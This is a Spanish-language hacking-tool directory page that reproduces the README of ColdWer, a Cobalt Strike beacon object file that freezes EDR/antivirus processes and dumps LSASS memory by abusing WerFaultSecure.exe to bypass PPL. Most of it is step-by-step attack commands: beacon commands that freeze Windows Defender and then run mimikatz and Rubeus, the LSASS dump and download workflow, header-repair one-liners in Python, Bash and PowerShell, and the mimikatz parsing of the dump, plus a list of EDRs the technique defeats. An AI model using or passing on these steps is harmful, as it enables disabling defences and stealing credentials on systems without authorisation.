Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ColdWer — BOF de Cobalt Strike para congelar procesos de EDR/AV y volcar LSASS mediante el bypass de PPL de WerFaultSecure.exe | Kitploit
Herramientas/GitHubGitHub/0xsh3llf1r3/coldwer
Escalada de PrivilegiosExplotaciónMovimiento LateralPost-ExplotaciónRed TeamingDesarrollo de Payloads
GitHub0xsh3llf1r3/coldwer

ColdWer

BOF de Cobalt Strike para congelar procesos de EDR/AV y volcar LSASS mediante el bypass de PPL de WerFaultSecure.exe

Ver Repositorio
144232hace 7 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ColdWer
Una guerra fría en tu endpoint.

Stars Forks License


🥶 ColdWer

ColdWer aprovecha la omisión de PPL de WerFaultSecure.exe para congelar procesos de EDR/AV y volcar la memoria LSASS en sistemas Windows modernos.

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Congela tu EDR/AV. Extrae lo que necesitas. Mantente frío.


👤 Autor

Sh3llf1r3 (@0xsh3llf1r3)


🙏 Créditos

Este proyecto se basa en la investigación de TwoSevenOneT (@TwoSevenOneT):

ProyectoDescripción
EDR-FreezeTécnica original de congelación de EDR
WSASSVolcado de LSASS mediante WerFaultSecure

Todo el crédito de las técnicas subyacentes es para TwoSevenOneT.


🔥 Características


🚀 Comenzando

📋 Requisitos previos

  • Cobalt Strike 4.x
  • Beacon de alta integridad (Administrador/SYSTEM)

💾 Instalación

  1. Clona el repositorio:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Carga el script aggressor en Cobalt Strike:
  • Ve a Cobalt Strike → Script Manager
  • Haz clic en Load
  • Selecciona cw/coldwer.cna

📦 Compilación desde el código fuente

root@kitploit:~
# Navega al directorio fuente
cd src/

# Compila BOF (requiere MinGW)
make

# O manualmente:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 Descarga rápida

  1. Ve a Releases
  2. Descarga coldwer.o y coldwer.cna
  3. Coloca ambos en la misma carpeta
  4. Carga coldwer.cna en Cobalt Strike

🖥️ Uso

❄️ Congelar EDR/AV

root@kitploit:~
# Encontrar PID de Windows Defender
beacon> ps

# Congelar el proceso
beacon> cw-freeze 1337

# Ejecutar comandos mientras EDR/AV está congelado
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Descongelar al terminar
beacon> cw-unfreeze

🔓 Volcar LSASS

root@kitploit:~

# Paso 1: Subir WerFaultSecure.exe de Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Paso 2: Encontrar PID de LSASS
beacon> ps

# Paso 3: Volcar LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Paso 4: Descargar el volcado
beacon> download C:\Windows\Temp\lsass.dmp

🔧 Después de la descarga

Cambia la cabecera del archivo para restaurar el formato minidump:

Original (PNG)Cambiar a (MDMP)
89 50 4E 474D 44 4D 50

Comandos para restaurar la cabecera:

MétodoComando
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Luego parsea con Mimikatz:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 Comandos

ComandoDescripción
cw-freeze <PID> [Path]Congelar proceso
cw-unfreezeDescongelar proceso previamente congelado
cw-dump <PID> <Path>Volcar memoria LSASS

📝 Ejemplos

root@kitploit:~
# Congelar con ruta por defecto
beacon> cw-freeze 1337

# Usar WerFaultSecure.exe personalizado
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# Volcar LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Descongelar al terminar
beacon> cw-unfreeze

✅ Objetivos compatibles

ObjetivoEstado
Windows Defender (MsMpEng.exe)✅ Funciona
LSASS (lsass.exe)✅ Funciona
Otros procesos PPL✅ Funciona

⚠️ Limitaciones

NO funciona contra EDRs con autoprotección en modo kernel:

EDREstado
Elastic Endpoint❌ Bloqueado
CrowdStrike Falcon❌ Bloqueado
SentinelOne❌ Bloqueado
Carbon Black❌ Bloqueado

⚙️ Cómo funciona

root@kitploit:~
1. 🚀 Launch WerFaultSecure.exe as PPL (WinTcb level)
                    ↓
2. 🎯 WerFaultSecure attaches to target process
                    ↓
3. ⏸️  MiniDumpWriteDump suspends all target threads
                    ↓
4. 🥶 Suspend WerFaultSecure itself → Target stays frozen
                    ↓
5. ✅ Execute your commands (EDR/AV can't see!)
                    ↓
6. 🔥 Terminate WerFaultSecure → Target unfreezes

🔑 ¿Por qué WerFaultSecure de Win8.1?

VersiónSalida
Windows 10/11Solo volcado cifrado
Windows 8.1Volcado sin cifrar en bruto

🔍 Solución de problemas


⚖️ Aviso legal

root@kitploit:~
⚠️ FOR AUTHORIZED SECURITY TESTING ONLY

This tool is intended for:
- Authorized penetration testing
- Red team operations with written permission
- Security research in controlled environments

The author is not responsible for any misuse or damage caused by this tool.
Unauthorized access to computer systems is illegal.

📜 Licencia

Licencia MIT - Ver LICENSE


🥶 Mantente Frío. Mantente en Silencio. 🥶

⭐ ¡Dale una estrella a este repo si te resulta útil! ⭐

Descargar herramienta
CaracterísticaDescripción
❄️ CongelarPoner los procesos EDR/AV en estado de coma
🔓 VolcarExtraer memoria LSASS omitiendo PPL
🛡️ Omisión de PPLAprovechar WerFaultSecure.exe a nivel WinTcb
⚡ RápidoEjecución BOF en línea
🎯 Control ManualTú decides cuándo congelar y descongelar
ErrorCausaSolución
Archivo no encontradoRuta inválidaVerificar ruta de WerFaultSecure.exe
Acceso denegadoPrivilegios bajosEjecutar como Administrador/SYSTEM
Firma inválidaBinario sin firmarUsar WerFaultSecure.exe firmado correctamente
El proceso no existePID incorrectoVerificar PID con comando ps
Objetivo protegidoProtección de kernelEDR tiene autoprotección (no se puede omitir)
Ya congeladoEstado atascadoEjecutar cw-unfreeze primero